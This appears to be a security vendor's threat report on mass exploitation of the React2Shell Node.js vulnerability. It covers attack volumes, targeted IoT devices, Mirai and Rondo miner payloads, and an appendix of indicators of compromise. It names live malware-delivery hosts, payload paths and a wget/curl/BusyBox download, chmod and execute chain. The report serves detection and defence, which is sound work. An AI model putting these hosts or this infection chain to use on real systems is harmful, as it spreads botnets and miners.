Shortly after details of CVE-2025-55182 became public, we began noticing large volumes of exploitation attempts across our endpoint and network sensors. The vulnerability, informally referred to as React2Shell, affects Node.js applications that allow user-supplied JSON data to influence internal JavaScript object structures. When improperly validated, attackers can escalate this into remote command execution through access to process.mainModule.require and, subsequently, child_process.execSync. For a complete overview of the vulnerability, we have the deep-dive blog post on Business Insights.

Because this vulnerability is simple to weaponize and widely applicable, it was rapidly adopted by botnet operators. Smart home insights for the past 30 days provide a clear picture of how the exploit is being used in active campaigns.

Scale of the attacks

We recorded more than 150,000 blocked exploit attempts matching the React2Shell pattern per day. The majority of detections involved direct command injection signatures linked to BusyBox execution, file download attempts via wget or curl, privilege modification through chmod, and various obfuscation patterns (including base64 decoding sequences designed to evade simple filtering).

While some requests were reconnaissance probes, most were structured payloads intended to download and run malware.

Attack origin

A significant portion of the traffic originates from a datacenter in Poland. One IP address in particular was responsible for more than 12,000 React2Shell-related events, along with port scanning and attempts to exploit known Hikvision vulnerabilities. This behavior aligns with patterns seen in Mirai-derived botnets, where compromised infrastructure is used both for scanning and for launching multi-vector attacks.

Additional probing comes from the United States, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and other regions, indicating broad global participation in opportunistic exploitation.

Targeted devices

Attack attempts were directed at a wide variety of device types, showing the opportunistic nature of such attempts. The most frequently targeted models included smart plugs, smart phones, NAS devices, surveillance systems, routers, development boards, as well as various makes and models of smart TVs and consumer electronics.

The large number of unknown device fingerprints suggests many attacks targeted generic Linux-based web interfaces that do not expose clear identification data. This spread matches established botnet targeting behavior: attackers probe any device with an exposed HTTP endpoint, regardless of manufacturer or purpose.

Payload analysis

We identified two major payload families delivered through React2Shell in the last week:

Mirai and Mirai-derived loaders.
These payloads often used BusyBox commands to download binaries from infrastructure hosted at 193.34.213[.]150, using filenames such as x86 and bolts. The infection chain included download, permission modification, execution, and a follow-up request to retrieve secondary components.
Rondo miner deployments.
Another campaign used the vulnerability to download the script rondo.aqu.sh from 41.231.37[.]153. This installer fetched both a propagation module and a cryptocurrency mining component.

Both types of campaigns align with typical botnet monetization strategies: distributed denial-of-service capability, further worming, and illicit mining.

Why React2Shell is being widely used

CVE-2025-55182 offers attackers a straightforward path from web request to system-level command execution. The exploit payload is compact, requires no advanced techniques, and works against a large class of Node.js applications. Botnet operators historically adopt vulnerabilities like this within days, and our monitoring shows that React2Shell is no exception.

What this means for users

The exploitation attempts we observed are automated and indiscriminate. Any publicly exposed service running a vulnerable implementation is a potential target. Organizations that develop or deploy Node.js applications should apply available patches immediately and verify that JSON parsing logic does not allow prototype pollution or object structure manipulation.

For IoT and consumer devices, reducing exposure through proper network segmentation and disabling unnecessary remote access remains essential. Once a device is compromised, it is commonly repurposed as an attack platform, perpetuating the cycle of scanning and exploitation.

We will continue monitoring activity related to CVE-2025-55182 and provide updates as new payloads or threat actors emerge.

Appendix: Indicators of Compromise (IoCs)

Malicious infrastructure

Primary exploit and malware delivery hosts observed in React2Shell campaigns:

193.34.213.150- Used to deliver Mirai-style binaries under paths including /nuts/x86 and /nuts/bolts. Payloads retrieved through wget, curl, or BusyBox. Frequently paired with chmod 777 and direct execution.
41.231.37.153 - Host serving the script rondo.aqu.sh, which deploys both a botnet loader and a cryptocurrency miner. Accessed through wget or curl with a fallback BusyBox retrieval chain.